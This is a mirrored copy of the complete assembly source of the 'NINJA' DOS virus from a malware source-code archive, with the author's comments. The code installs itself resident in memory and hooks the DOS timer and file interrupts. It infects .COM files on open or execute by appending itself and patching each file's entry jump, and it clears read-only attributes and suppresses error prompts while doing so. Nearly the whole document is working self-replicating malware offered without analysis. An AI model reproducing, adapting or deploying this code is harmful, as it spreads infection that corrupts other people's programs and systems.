mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
530 lines
16 KiB
NASM
530 lines
16 KiB
NASM
|
;NINJA virus v1.1 _sandoz_
|
|||
|
|
|||
|
;I dont believe that NINJA scans, it was developed from Soviet block virus
|
|||
|
;code that was aquired late in 1988. For this reason some features are missing
|
|||
|
;such as original encryption, which really wont be missed. However some features
|
|||
|
;are rather unique. used were System Violator's Virus Mutator and some luck.
|
|||
|
;an oldie but interesting.
|
|||
|
|
|||
|
cseg segment
|
|||
|
|
|||
|
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
|
|||
|
org 100h
|
|||
|
|
|||
|
l_0100: mov bx,offset l_0146 ;0100.BB 0146
|
|||
|
jmp bx ;Register jump ;0103 FF E3
|
|||
|
|
|||
|
;-------victim code----------------------------------------------
|
|||
|
; ...
|
|||
|
org 0146h
|
|||
|
|
|||
|
;=======virus code begin=========================================
|
|||
|
; in resident virus this code begins at 9000h:0A000h
|
|||
|
;----------------------------------------------------------------
|
|||
|
l_0146: push ds ;<- Entry into virus ;0146 1E
|
|||
|
push es ;0147 06
|
|||
|
push ax ;0148 50
|
|||
|
NOP
|
|||
|
push ds ;<-victim code restore ;0149 1E
|
|||
|
pop es ;014A 07
|
|||
|
|
|||
|
mov si,bx ;offset wejscia w wirusa;014B 8B F3
|
|||
|
add si,02D3h ;(419)changed code saved;014D.81 C6 02D3
|
|||
|
mov di,0100h ;changed code address ;0151.BF 0100
|
|||
|
mov cx,5 ;length of change ;0154 B9 0005
|
|||
|
rep movsb ;0157 F3/ A4
|
|||
|
push ds ;0159 1E
|
|||
|
|
|||
|
xor ax,ax ;<- get int 8 ;015A 31 C0
|
|||
|
push ax ;015C 50
|
|||
|
|
|||
|
pop ds ;015D 1F
|
|||
|
mov si,20h ;int 8h ;015E.BE 0020
|
|||
|
mov di,bx ;0161 8B FB
|
|||
|
add di,0E6h ;(022Ch)=old int 8 ;0163.81 C7 00E6
|
|||
|
mov cx,4 ;0167 B9 0004
|
|||
|
rep movsb ;016A F3/ A4
|
|||
|
mov ax,bx ;016C 8B C3
|
|||
|
add ax,57h ;(019Dh)=continuat. adr.;016E 05 0057
|
|||
|
call s_0193 ;0171 E8 001F
|
|||
|
|
|||
|
pop ds ;0174 1F
|
|||
|
l_0175: jmp short l_0175 ;int 8 waiting loop ;0175 EB FE
|
|||
|
|
|||
|
;<----- return after int 8 service-------------------------------
|
|||
|
l_0177: cli ;<- int 8 vector restore;0177 FA
|
|||
|
xor ax,ax ;0178 31 C0
|
|||
|
mov es,ax ;017A 8E C0
|
|||
|
mov di,0020h ;017C.BF 20 00
|
|||
|
mov si,bx ;017F 8B F3
|
|||
|
|
|||
|
add si,0E9h ;(022Ch) ;0181.81 C6 E6 00
|
|||
|
mov cx,4 ;0185 B9 04 00
|
|||
|
repz movsb ;0188 F3 / A4
|
|||
|
sti ;018A FB
|
|||
|
NOP
|
|||
|
pop ax ;<- run victim programm ;018B 58
|
|||
|
pop es ;018C 07
|
|||
|
pop ds ;018D 1F
|
|||
|
mov bx,0100h ;execution begin address;018E.BB 00 01
|
|||
|
|
|||
|
jmp bx ;0191 FF E3
|
|||
|
|
|||
|
|
|||
|
;<----- "get int 8" routine -------------------------------------
|
|||
|
s_0193 proc near
|
|||
|
cli ; Disable interrupts ;0193 FA
|
|||
|
mov ds:[20h],ax ;0194 A3 0020
|
|||
|
mov ds:[22h],es ;0197 8C 06 0022
|
|||
|
sti ; Enable interrupts ;019B FB
|
|||
|
|
|||
|
retn ;019C C3
|
|||
|
s_0193 endp
|
|||
|
|
|||
|
;<----- code executed after interrupt int 8----------------------
|
|||
|
l_019D: pushf ;019D 9C
|
|||
|
push ax ;019E 50
|
|||
|
push bx ;019F 53
|
|||
|
push cx ;01A0 51
|
|||
|
push dx ;01A1 52
|
|||
|
|
|||
|
push si ;01A2 56
|
|||
|
push di ;01A3 57
|
|||
|
push es ;01A4 06
|
|||
|
push ds ;01A5 1E
|
|||
|
push bp ;01A6 55
|
|||
|
|
|||
|
mov bp,sp ;01A7 8B EC
|
|||
|
mov ax,bx ;base to virus code ;01A9 8B C3
|
|||
|
add ax,2Fh ;(175h) ;01AB 05 002F
|
|||
|
|
|||
|
cmp ss:[bp+14h],ax ;interrupted code CS seg;01AE 36 39 46 14
|
|||
|
jnz l_0220 ;-> we must wait again ;01B2 75 6C
|
|||
|
|
|||
|
l_01B4: add word ptr ss:[BP+14],3 ;chng ret addr to l_0177;01B4 36 83 46 14 03
|
|||
|
|
|||
|
;<- restore int 8 vector
|
|||
|
push ds ;02B9 1E
|
|||
|
xor ax,ax ;01BA 31 C0
|
|||
|
push ax ;01BC 50
|
|||
|
|
|||
|
POP DS ;01BD 1F
|
|||
|
CLI ;01BE FA
|
|||
|
MOV AX,cs:[BX+00E6h] ;(022Ch) old int 8 vect ;01BF 2E 8B 87 E6 00
|
|||
|
MOV ds:[20h],AX ;01C4 A3 20 00
|
|||
|
MOV AX,cs:[BX+00E8h] ;01C7 2E 8B 87 E8 00
|
|||
|
MOV ds:[22h],AX ;01CC A3 22 00
|
|||
|
POP DS ;01CF 1F
|
|||
|
|
|||
|
MOV AX,9000h ;memory last 64KB ;01D0 B8 00 90
|
|||
|
|
|||
|
MOV ES,AX ;01D3 8E C0
|
|||
|
MOV SI,BX ;virus code begin ;01D5 8B F3
|
|||
|
MOV DI,0A000h ;the last 24KB of mem ;01D7 BF 00 A0
|
|||
|
MOV AL,es:[DI] ;01DA 26 8A 05
|
|||
|
CMP AL,1Eh ;allready installed ? ;01DD 3C 1E
|
|||
|
JZ l_0220 ;-> yes, end of job ;01DF 74 3F
|
|||
|
MOV CX,02FBh ;virus code length ;01E1 B9 FB 02
|
|||
|
REPZ MOVSB ;copy virus code ;01E4 F3 / A4
|
|||
|
;<- Make link to DOS
|
|||
|
|
|||
|
CALL s_0230 ;first DOS version ;01E6 E8 47 00
|
|||
|
JZ l_0220 ;-> O.K. ;01E9 74 35
|
|||
|
CALL s_027D ;Second DOS version ;01EB E8 8F 00
|
|||
|
JZ l_0220 ;-> O.K. ;01EE 74 30
|
|||
|
CALL s_02CA ;third DOS version ;01F0 E8 D7 00
|
|||
|
JZ l_0220 ;-> O.K. ;01F3 74 2B
|
|||
|
|
|||
|
;<- Unknown DOS version, BRUTE installation
|
|||
|
MOV AX,9000h ;01F5 B8 00 90
|
|||
|
|
|||
|
PUSH AX ;01F8 50
|
|||
|
POP ES ;01F9 07
|
|||
|
XOR AX,AX ;01FA 31 C0
|
|||
|
PUSH AX ;01FC 50
|
|||
|
POP DS ;01FD 1F
|
|||
|
MOV AX,ds:[84h] ;01FE A1 84 00
|
|||
|
MOV es:[0A1DFh],AX ;(0325) ;0201 26 A3 DF A1
|
|||
|
MOV es:[0A2CEh],AX ;(0414) ;0205 26 A3 CE A2
|
|||
|
MOV AX,ds:[86h] ;0209 A1 86 00
|
|||
|
|
|||
|
MOV es:[0A1E1h],AX ;(0327) ;020C 26 A3 E1 A1
|
|||
|
MOV es:[0A2D0h],AX ;(0416) ;0210 26 A3 D0 A2
|
|||
|
MOV AX,0A1D1h ;(0317) new int 21h hndl;0214 B8 D1 A1
|
|||
|
MOV ds:[84h],AX ;int 21h ;0217 A3 84 00
|
|||
|
MOV AX,9000h ;resident virus segment ;021A B8 00 90
|
|||
|
MOV ds:[86h],AX ;021D A3 86 00
|
|||
|
|
|||
|
l_0220: pop bp ;0220 5D
|
|||
|
pop ds ;0221 1F
|
|||
|
|
|||
|
pop es ;0221 07
|
|||
|
pop di ;0222 5F
|
|||
|
pop si ;0223 5E
|
|||
|
pop dx ;0224 5A
|
|||
|
pop cx ;0226 59
|
|||
|
pop bx ;0227 5B
|
|||
|
pop ax ;0228 58
|
|||
|
popf ;0229 9D
|
|||
|
sti ;022A FB
|
|||
|
|
|||
|
db 0EAh ;022B EA
|
|||
|
r_00E6 db 0ABh,00h,0C2h,0Bh ;022C AB 00 C2 0B
|
|||
|
; jmp 0BC2:00AB ;-> oryginal int 8
|
|||
|
|
|||
|
|
|||
|
;================================================================
|
|||
|
; Make link to DOS - first DOS version
|
|||
|
;----------------------------------------------------------------
|
|||
|
s_0230: PUSH DS ;0230 1E
|
|||
|
|
|||
|
PUSH ES ;0231 06
|
|||
|
XOR AX,AX ;<- check possibility ;0232 31 C0
|
|||
|
PUSH AX ;0234 50
|
|||
|
POP DS ;0235 1F
|
|||
|
MOV AX,ds:[86h] ;oryginal int 21h seg ;0236 A1 86 00
|
|||
|
PUSH AX ;0239 50
|
|||
|
POP DS ;023A 1F
|
|||
|
MOV BX,0100h ;023B BB 00 01
|
|||
|
CMP BYTE PTR [BX],0E9h ;023E 80 3F E9
|
|||
|
|
|||
|
JNZ l_027A ;-> unknown system ;0241 75 37
|
|||
|
INC BX ;0243 43
|
|||
|
CMP BYTE PTR [BX],53h ;0244 80 3F 53
|
|||
|
JNZ l_027A ;-> unknown system ;0247 75 31
|
|||
|
INC BX ;0249 43
|
|||
|
CMP BYTE PTR [BX],22h ;024A 80 3F 22
|
|||
|
JNZ l_027A ;-> unknown system ;024D 75 2B
|
|||
|
|
|||
|
;<- make link to DOS
|
|||
|
|
|||
|
MOV AX,9000h ;024F B8 00 90
|
|||
|
MOV ES,AX ;0252 8E C0
|
|||
|
|
|||
|
MOV SI,1223h ;0254 BE 23 12
|
|||
|
MOV DI,0A2CEh ;(0414) ;0257 BF CE A2
|
|||
|
MOV CX,4 ;025A B9 04 00
|
|||
|
REPZ MOVSB ;025D F3 / A4
|
|||
|
|
|||
|
MOV SI,1223h ;025F BE 23 12
|
|||
|
|
|||
|
MOV DI,0A1DFh ;(0325) ;0262 BF DF A1
|
|||
|
MOV CX,4 ;0265 B9 04 00
|
|||
|
REPZ MOVSB ;0268 F3 / A4
|
|||
|
|
|||
|
MOV AX,0A1D1h ;(0317)=new int 21h hndl;026A B8 D1 A1
|
|||
|
MOV ds:[1223h],AX ;026D A3 23 12
|
|||
|
MOV AX,9000h ;0270 B8 00 90
|
|||
|
MOV ds:[1225h],AX ;0273 A3 25 12
|
|||
|
|
|||
|
|
|||
|
XOR AX,AX ;0276 31 C0
|
|||
|
CMP AL,AH ;0278 38 E0
|
|||
|
|
|||
|
l_027A: pop es ;027A 07
|
|||
|
pop ds ;027B 1F
|
|||
|
retn ;027C C3
|
|||
|
|
|||
|
;================================================================
|
|||
|
; Make link to DOS - second DOS version
|
|||
|
|
|||
|
;----------------------------------------------------------------
|
|||
|
s_027D: push ds ;027D 1E
|
|||
|
push es ;027E 06
|
|||
|
xor ax,ax ;<- check possibility ;027F 31 C0
|
|||
|
push ax ;0281 50
|
|||
|
pop ds ;0282 1F
|
|||
|
mov ax,ds:[86h] ;oryginal int 21h seg ;0283 A1 0086
|
|||
|
push ax ;0286 50
|
|||
|
pop ds ;0287 1F
|
|||
|
|
|||
|
mov bx,0100h ;0288 .BB 0100
|
|||
|
cmp byte ptr [bx],0E9h ;028B 80 3F E9
|
|||
|
jne l_02C7 ;-> unknown system ;028E 75 37
|
|||
|
inc bx ;0290 43
|
|||
|
cmp byte ptr [bx],0CAh ;0291 80 3F CA
|
|||
|
jne l_02C7 ;-> unknown system ;0294 75 31
|
|||
|
inc bx ;0296 43
|
|||
|
cmp byte ptr [bx],13h ;0297 80 3F 13
|
|||
|
jne l_02C7 ;-> unknown system ;029A 75 2B
|
|||
|
|
|||
|
|
|||
|
;<- make link to DOS
|
|||
|
mov ax,9000h ;029C B8 9000
|
|||
|
mov es,ax ;029F 8E C0
|
|||
|
mov si,011Dh ;02A1 .BE 011D
|
|||
|
mov di,0A2CEh ;(0414) ;02A4 .BF A2CE
|
|||
|
mov cx,4 ;02A7 B9 0004
|
|||
|
rep movsb ;02AA F3/ A4
|
|||
|
mov si,011Dh ;02AC .BE 011D
|
|||
|
|
|||
|
mov di,0A1DFh ;(0325) ;02AF .BF A1DF
|
|||
|
mov cx,4 ;02B2 B9 0004
|
|||
|
rep movsb ;02B5 F3/ A4
|
|||
|
|
|||
|
mov ax,0A1D1h ;(0317)=new int 21h hndl;02B7 B8 A1D1
|
|||
|
mov ds:[011Dh],ax ;02BA A3 011D
|
|||
|
mov ax,9000h ;02BD B8 9000
|
|||
|
mov ds:[011Fh],ax ;02C0 A3 011F
|
|||
|
|
|||
|
|
|||
|
xor ax,ax ;02C3 31 C0
|
|||
|
cmp al,ah ;02C5 38 E0
|
|||
|
|
|||
|
l_02C7: pop es ;02C7 07
|
|||
|
pop ds ;02C8 1F
|
|||
|
retn ;02C9 C3
|
|||
|
|
|||
|
;===============================================================
|
|||
|
; Make link to DOS - third DOS version
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
s_02CA: push ds ;02CA 1E
|
|||
|
push es ;02CB 06
|
|||
|
xor ax,ax ;<- check possibility ;02CC 31 C0
|
|||
|
push ax ;02CE 50
|
|||
|
pop ds ;02CF 1F
|
|||
|
mov ax,ds:[86h] ;oryginal int 21h seg ;02D0 A1 0086
|
|||
|
push ax ;02D3 50
|
|||
|
pop ds ;02D4 1F
|
|||
|
|
|||
|
mov bx,100h ;02D5 .BB 0100
|
|||
|
cmp byte ptr [bx],0E9h ;02D8 80 3F E9
|
|||
|
jne l_0314 ;-> unknown system ;02DB 75 37
|
|||
|
inc bx ;02DD 43
|
|||
|
cmp byte ptr [bx],15h ;02DE 80 3F 15
|
|||
|
jne l_0314 ;-> unknown system ;02E1 75 31
|
|||
|
inc bx ;02E3 43
|
|||
|
cmp byte ptr [bx],5 ;02E4 80 3F 05
|
|||
|
jne l_0314 ;-> unknown system ;02E7 75 2B
|
|||
|
|
|||
|
|
|||
|
;<- make link to DOS
|
|||
|
mov ax,9000h ;02E9 B8 9000
|
|||
|
mov es,ax ;02EC 8E C0
|
|||
|
|
|||
|
mov si,0040Fh ;02EE .BE 040F
|
|||
|
mov di,0A2CEh ;(0414) ;02F1 .BF A2CE
|
|||
|
mov cx,4 ;02F4 B9 0004
|
|||
|
rep movsb ;02F7 F3/ A4
|
|||
|
|
|||
|
|
|||
|
mov si,0040Fh ;02F9 .BE 040F
|
|||
|
mov di,0A1DFh ;(0325) ;02FC .BF A1DF
|
|||
|
mov cx,4 ;02FF B9 0004
|
|||
|
rep movsb ;0302 F3/ A4
|
|||
|
|
|||
|
mov ax,0A1D1h ;(0317)=new int 21h hndl;0304 B8 A1D1
|
|||
|
mov ds:[040Fh],ax ;0307 A3 040F
|
|||
|
mov ax,9000h ;030A B8 9000
|
|||
|
|
|||
|
mov ds:[0411h],ax ;030D A3 0411
|
|||
|
|
|||
|
xor ax,ax ;0310 31 C0
|
|||
|
cmp al,ah ;0312 38 E0
|
|||
|
|
|||
|
l_0314: pop es ;0314 07
|
|||
|
pop ds ;0315 1F
|
|||
|
retn ;0316 C3
|
|||
|
|
|||
|
|
|||
|
;==========================================================================
|
|||
|
; New int 21h handling subroutine
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
T_A1D1: cmp ah,3Dh ;open file ? ;0317 80 FC 3D
|
|||
|
je l_0321 ;-> Yes ;031A 74 05
|
|||
|
cmp ah,4Bh ;load&execute/load ovl ?;031C 80 FC 4B
|
|||
|
jne l_0324 ;-> No ;031F 75 03
|
|||
|
l_0321: call s_0329 ;-> infect file ;0321 E8 0005
|
|||
|
|
|||
|
|
|||
|
l_0324: db 0EAh ;<- oryginal int 21h ;0324 EA
|
|||
|
d_A1DF dw 1460h,0273h ;old int 21h ;0325 60 14 73 02
|
|||
|
; jmp far ptr 0273:1460
|
|||
|
|
|||
|
;==========================================================================
|
|||
|
; Infecting subroutine
|
|||
|
;--------------------------------------------------------------------------
|
|||
|
s_0329 proc near
|
|||
|
push ax ;0329 50
|
|||
|
|
|||
|
push bx ;032A 53
|
|||
|
push cx ;032B 51
|
|||
|
push dx ;032C 52
|
|||
|
push ds ;032D 1E
|
|||
|
push di ;032E 57
|
|||
|
push si ;032F 56
|
|||
|
push es ;0330 06
|
|||
|
push ds ;0331 1E
|
|||
|
push es ;0332 06
|
|||
|
|
|||
|
NOP
|
|||
|
xor ax,ax ;<- get int 24h ;0333 31 C0
|
|||
|
push ax ;0335 50
|
|||
|
pop ds ;0336 1F
|
|||
|
push cs ;0337 0E
|
|||
|
pop es ;0338 07
|
|||
|
mov si,90h ;int 24h vector ;0339 .BE 0090
|
|||
|
mov di,0A2E0h ;(0426)-old vector safes;033C .BF A2E0
|
|||
|
mov cx,4 ;double word ;033F B9 0004
|
|||
|
|
|||
|
rep movsb ;0342 F3/ A4
|
|||
|
mov ax,0A2C9h ;(040F)=new int 24h ;0344 B8 A2C9
|
|||
|
mov ds:[90h],ax ;0347 A3 0090
|
|||
|
mov ds:[92h],cs ;034A 8C 0E 0092
|
|||
|
NOP
|
|||
|
pop es ;034E 07
|
|||
|
pop ds ;034F 1F
|
|||
|
mov di,dx ;file path ;0350 8B FA
|
|||
|
push ds ;0352 1E
|
|||
|
|
|||
|
pop es ;0353 07
|
|||
|
mov cx,40h ;find dot ;0354 B9 0040
|
|||
|
mov al,2Eh ;0357 B0 2E
|
|||
|
repne scasb ;0359 F2/ AE
|
|||
|
cmp cx,0 ;035B 83 F9 00
|
|||
|
jne l_0363 ;035E 75 03
|
|||
|
jmp l_0406 ;-> no file extension ;0360 E9 00A3
|
|||
|
|
|||
|
l_0363: push cs ;0363 0E
|
|||
|
|
|||
|
pop es ;0364 07
|
|||
|
mov si,di ;0365 8B F7
|
|||
|
mov di,0A2DDh ;(0423)='COM' ;0367 .BF A2DD
|
|||
|
mov cx,3 ;036A B9 0003
|
|||
|
repe cmpsb ;036D F3/ A6
|
|||
|
cmp cx,0 ;036F 83 F9 00
|
|||
|
je l_0377 ;0372 74 03
|
|||
|
jmp l_0406 ;-> it isn't *.COM ;0374 E9 008F
|
|||
|
|
|||
|
|
|||
|
;<- *.COM file infection
|
|||
|
l_0377: mov ax,4300h ;Get file attributes ;0377 B8 4300
|
|||
|
call s_0412 ;int 21h call ;037A E8 0095
|
|||
|
mov ds:[0A2E4h],cx ;(042A) ;037D 89 0E A2E4
|
|||
|
|
|||
|
and cx,0FFFEh ;no R/O ;0381 81 E1 FFFE
|
|||
|
mov ax,4301h ;Set file attributes ;0385 B8 4301
|
|||
|
call s_0412 ;int 21h call ;0388 E8 0087
|
|||
|
|
|||
|
|
|||
|
mov ah,3Dh ;Open File ;038B B4 3D
|
|||
|
mov al,2 ;R/W access ;038D B0 02
|
|||
|
call s_0412 ;int 21h call ;038F E8 0080
|
|||
|
jc l_0406 ;-> Opening Error ;0392 72 72
|
|||
|
push cs ;0394 0E
|
|||
|
pop ds ;0395 1F
|
|||
|
mov bx,ax ;file handle ;0396 8B D8
|
|||
|
mov dx,0A2D3h ;(0419) = file buffer ;0398 BA A2D3
|
|||
|
mov cx,5 ;bytes count ;039B B9 0005
|
|||
|
|
|||
|
mov ah,3Fh ;read file ;039E B4 3F
|
|||
|
call s_0412 ;int 21h call ;03A0 E8 006F
|
|||
|
|
|||
|
mov ah,0BBh ;allready infected ? ;03A3 B4 BB
|
|||
|
cmp ah,ds:[0A2D3h] ;(0419) ;03A5 3A 26 A2D3
|
|||
|
je l_03E2 ;-> yes, close file ;03A9 74 37
|
|||
|
xor cx,cx ;03AB 31 C9
|
|||
|
xor dx,dx ;03AD 31 D2
|
|||
|
mov ah,42h ;Move file ptr ;03AF B4 42
|
|||
|
|
|||
|
mov al,2 ;EOF + offset ;03B1 B0 02
|
|||
|
call s_0412 ;int 21h call ;03B3 E8 005C
|
|||
|
|
|||
|
cmp ax,0FA00h ;file size =<64000 ;03B6 3D FA00
|
|||
|
ja l_03E2 ;-> above, close file ;03B9 77 27
|
|||
|
add ax,100h ;PSP length ;03BB 05 0100
|
|||
|
mov ds:[0A2D9h],ax ;(041F) - vir.begin addr;03BE A3 A2D9
|
|||
|
mov ah,40h ;Write file ;03C1 B4 40
|
|||
|
mov dx,0A000h ;address of buffer ;03C3 BA A000
|
|||
|
|
|||
|
mov cx,2FBh ;bytes count ;03C6 B9 02FB
|
|||
|
call s_0412 ;int 21h call ;03C9 E8 0046
|
|||
|
|
|||
|
xor cx,cx ;03CC 31 C9
|
|||
|
xor dx,dx ;03CE 31 D2
|
|||
|
mov ah,42h ;Move file ptr ;03D0 B4 42
|
|||
|
mov al,0 ;BOF + offset ;03D2 B0 00
|
|||
|
call s_0412 ;int 21h call ;03D4 E8 003B
|
|||
|
|
|||
|
|
|||
|
mov ah,40h ;Write file ;03D7 B4 40
|
|||
|
mov dx,0A2D8h ;(041E)=BOF virus code ;03D9 BA A2D8
|
|||
|
mov cx,5 ;code length ;03DC B9 0005
|
|||
|
call s_0412 ;int 21h call ;03DF E8 0030
|
|||
|
|
|||
|
l_03E2: mov ah,3Eh ;close file ;03E2 B4 3E
|
|||
|
call s_0412 ;int 21h call ;03E4 E8 002B
|
|||
|
|
|||
|
mov cx,ds:[0A2E4h] ;(042A) - old atribute ;03E7 8B 0E A2E4
|
|||
|
|
|||
|
mov ax,4301h ;set file attributes ;03EB B8 4301
|
|||
|
call s_0412 ;int 21h call ;03EE E8 0021
|
|||
|
push ds ;03F1 1E
|
|||
|
push es ;03F2 06
|
|||
|
|
|||
|
xor ax,ax ;restore int 24h vector ;03F3 31 C0
|
|||
|
push ax ;03F5 50
|
|||
|
pop es ;03F6 07
|
|||
|
push cs ;03F7 0E
|
|||
|
|
|||
|
pop ds ;03F8 1F
|
|||
|
mov di,90h ;int 24h vector ;03F9 .BF 0090
|
|||
|
mov si,0A2E0h ;(0426) - old int 24h ;03FC .BE A2E0
|
|||
|
mov cx,4 ;double word ;03FF B9 0004
|
|||
|
rep movsb ;0402 F3/ A4
|
|||
|
pop es ;0404 07
|
|||
|
pop ds ;0405 1F
|
|||
|
l_0406: pop es ;<- EXIT ;0406 07
|
|||
|
pop si ;0407 5E
|
|||
|
|
|||
|
pop di ;0408 5F
|
|||
|
pop ds ;0409 1F
|
|||
|
pop dx ;040A 5A
|
|||
|
pop cx ;040B 59
|
|||
|
pop bx ;040C 5B
|
|||
|
pop ax ;040D 58
|
|||
|
retn ;040E C3
|
|||
|
s_0329 endp
|
|||
|
|
|||
|
|
|||
|
;================================================================
|
|||
|
; int 24h handling routine (only infection time)
|
|||
|
;----------------------------------------------------------------
|
|||
|
T_A2C9: mov al,0 ;ignore critical error ;040F B0 00
|
|||
|
iret ;0411 CF
|
|||
|
|
|||
|
;================================================================
|
|||
|
; hidden int 21h call
|
|||
|
;----------------------------------------------------------------
|
|||
|
|
|||
|
s_0412 proc near
|
|||
|
pushf ;0412 9C
|
|||
|
db 9Ah ;0413 9A
|
|||
|
d_A2CE dw 1460h,0273h ;old int 21h ;0414 60 14 73 02
|
|||
|
;call far ptr 0273:1460
|
|||
|
retn ;0418 C3
|
|||
|
s_0412 endp
|
|||
|
|
|||
|
;<----- oryginal BOF code
|
|||
|
d_A2D3 db 31h,0Dh,0Ah,32h,0Dh ;0419 31 0D 0A 32 0D
|
|||
|
|
|||
|
;<----- wirus BOF code
|
|||
|
d_A2D8 db 0BBh ;041E BB
|
|||
|
d_A2D9 dw 0146h ;virus begin address ;041F 46 01
|
|||
|
dw 0E3FFh ;0421 FF E3
|
|||
|
|
|||
|
;<----- work bytes
|
|||
|
d_A2DD db 'COM' ;file extension pattern ;0423 43 4F 4D
|
|||
|
d_A2E0 dw 0556h,1232h ;old int 24h vector ;0426 56 05 32 12
|
|||
|
d_A2E4 dw 0 ;file attributes ;042A 00 00
|
|||
|
|
|||
|
;<----- just my way of sayin' howdy
|
|||
|
db '-=NINJA=- <sandoz 1993>' ;042C 50 43 2D 46 4C 55
|
|||
|
; 20 62 79 20 57 49
|
|||
|
; 5A 41 52 44 20 31
|
|||
|
; 39 39 31
|
|||
|
cseg ends
|
|||
|
|
|||
|
end l_0100
|
|||
|
|